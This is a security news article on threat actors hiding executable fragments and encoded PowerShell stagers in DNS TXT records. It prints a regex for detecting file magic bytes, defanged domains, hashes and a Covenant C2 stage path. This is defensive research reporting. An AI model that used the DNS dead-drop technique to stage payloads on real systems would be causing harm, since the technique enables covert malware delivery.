Cybercriminals Leveraging DNS Gaps to Conceal and Distribute Malware

A sophisticated technique where threat actors are exploiting DNS infrastructure to hide malware and establish persistent command-and-control communications, turning the internet’s foundational addressing system into an unwitting storage and delivery platform for malicious software.

The discovery, made through analysis of passively collected DNS records in DNSDB Scout, reveals how attackers partition executable files and store them across multiple DNS TXT records in hexadecimal format.

^”((ffd8ffe[0-9a-f].{12,})|(89504e47.{12,})|(47494638[79]61.{8,})|(255044462d.{10,})|(504b0304.{12,})|(4d5a.{16,59}|4d5a.{61,})|(7f454c46.{12,})|(c[ef]faedfe.{12,})|(1f8b08.{14,})|(377abcaf271c.{8,})|(526172211a07.{8,})).

This method allows malware to persist until DNS servers remove or overwrite the records, effectively creating a distributed storage system that operates beneath the radar of traditional security monitoring.

Researchers identified the malicious activity by searching for magic file bytes—unique hexadecimal sequences that identify file types—at the beginning of DNS TXT records.

Using regex patterns to detect executable file headers, they discovered TXT records containing the magic sequence for Windows executable files across three different domains sharing identical subdomain patterns.

The investigation focused on domains following the pattern “*.felix.stf.whitetreecollective[.]com,” which contained hundreds of iterated subdomain integer values, each storing different fragments of executable files.

The integer values served as sequence markers, enabling the reconstruction of complete malware payloads when DNS queries were made in the correct order.

When researchers pieced together the fragmented files using the sequential TXT record data, they recovered two complete executables with SHA256 hashes 7ff0ecf2953b8662ede1577e330a514f09992c18aa3c14ed77cf2ffc115b0866 and e7b22ba761a7f853b63933ffe517cc61596710dbdee992a429ac1bc8d04186a1.

Command-and-Control Infrastructure

Beyond file storage, the investigation revealed that attackers were using DNS TXT records to store malicious commands and establish communication with command-and-control servers.

Multiple TXT records associated with drsmitty[.]com contained encoded PowerShell scripts that functioned as malware stagers.

These scripts, when decoded and executed, would connect to external domains such as cspg[.]pw and request additional payloads from specific endpoints.

The URL pattern “/api/v1/nps/payload/stage1” matches the default configuration for Covenant C2 servers, a popular post-exploitation framework used by threat actors to maintain persistent access to compromised systems.

Long-Term Campaign

Analysis revealed both files were Joke Screenmate malware—prank software designed to display fake error messages, interfere with user control, and consume system resources while evading closure attempts.

The campaign demonstrates remarkable persistence, with evidence suggesting the same threat actors maintained operations across multiple years.

The same C2 domain referenced in the 2021-2022 ScreenMate malware distribution was also observed in DNS TXT records from July 2017, specifically in records associated with msg1.rickrick.qa.urab[.]org.

This technique represents a concerning evolution in malware distribution methods, exploiting the inherent trust placed in DNS infrastructure while operating in spaces where traditional security monitoring may have limited visibility.

The persistence of these records until manual removal or overwrite creates an effective dead-drop system that can remain operational for extended periods without direct attacker intervention.

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.